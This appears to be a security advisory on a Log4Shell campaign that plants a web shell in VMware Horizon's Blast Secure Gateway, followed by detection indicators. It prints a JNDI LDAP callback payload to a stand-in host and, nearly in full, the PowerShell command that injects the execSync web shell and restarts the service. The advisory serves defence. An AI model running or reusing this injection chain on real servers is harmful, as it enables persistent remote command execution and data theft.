Log4Shell Vulnerabilities in VMware Horizon Targeted to Install Web Shells

An unknown threat group has been observed targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities in order to establish persistence within affected networks.

The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface^TM (JNDI) via Log4Shell payloads to call back to malicious infrastructure.

Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.

The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.

The attack is very likely initiated via a Log4Shell payload similar to ${jndi:ldap://example.com}. The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon. This then launches the following PowerShell command, spawned from ws_TomcatService.exe:

powershell -c "$path=gwmi win32_service|?{$.Name -like """VMBlastSG"""}|%{$.PathName -replace '"""', '' -replace """nssm.exe""","""lib\absg-worker.js"""};

The executed command invokes Get-WMIObject on win32_service, returning a list of service names containing 'VMBlastSG'. It identifies the file path for the service, replaces instances of 'nssm.exe' with 'lib/absg-worker.js' and writes this path to $path, thereby identifying the location of the 'absg-worker.js' file for the targeted VMware Horizon instance.

$expr="""req.connection.end();

if(String(req.url).includes('REDACTED')) {try {replyError(req, res, 200, require('child_process').execSync(Buffer.from(req.headers['data'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());

catch (err) {replyError(req, res, 400, err.stderr.toString());

return;""";

This writes a code block to $expr that listens for any web requests containing a specific, hardcoded string in the URI before executing arbitrary commands contained in the 'data' header object. The output is delivered to the attacker via 'replyError' where requests contained the specified string, otherwise a standard error message is returned.

(Get-Content $path)|ForEach-Object {$_ -replace """req.connection.end()\;""", $expr}|Set-Content $path;Restart-Service -Force VMBlastSG"

Retrieves the list of service path names stored in $path and for each replaces any instances of "req.connection.end()\;" with the code block stored in $expr described above, thereby injecting the web shell. The altered 'absg-worker.js' file then contains:

The 'VMBLastSG' service is then forcibly restarted to initiate the listener.

Once established, the listener will execute arbitrary commands received in crafted web (HTTP / HTTPS) requests if a particular hardcoded string (key) is present in the URI of the request. The commands are stored as a header object (named 'data') in the crafted requests. This process is used to establish persistent communication with a command and control server that could then be used to carry out other malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.

A representative diagram of the attack is provided below:

Organisations should look for the following:

• Evidence of ws_TomcatService.exe spawning abnormal processes
• Any powershell.exe processes containing ‘VMBlastSG’ in the commandline
• File modifications to ‘…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js’ - This file is generally overwritten during upgrades, and not modified

Any organisations that detect anomalous activity fitting the above patterns should contact CSOC via 0300 303 5222 or email [email protected]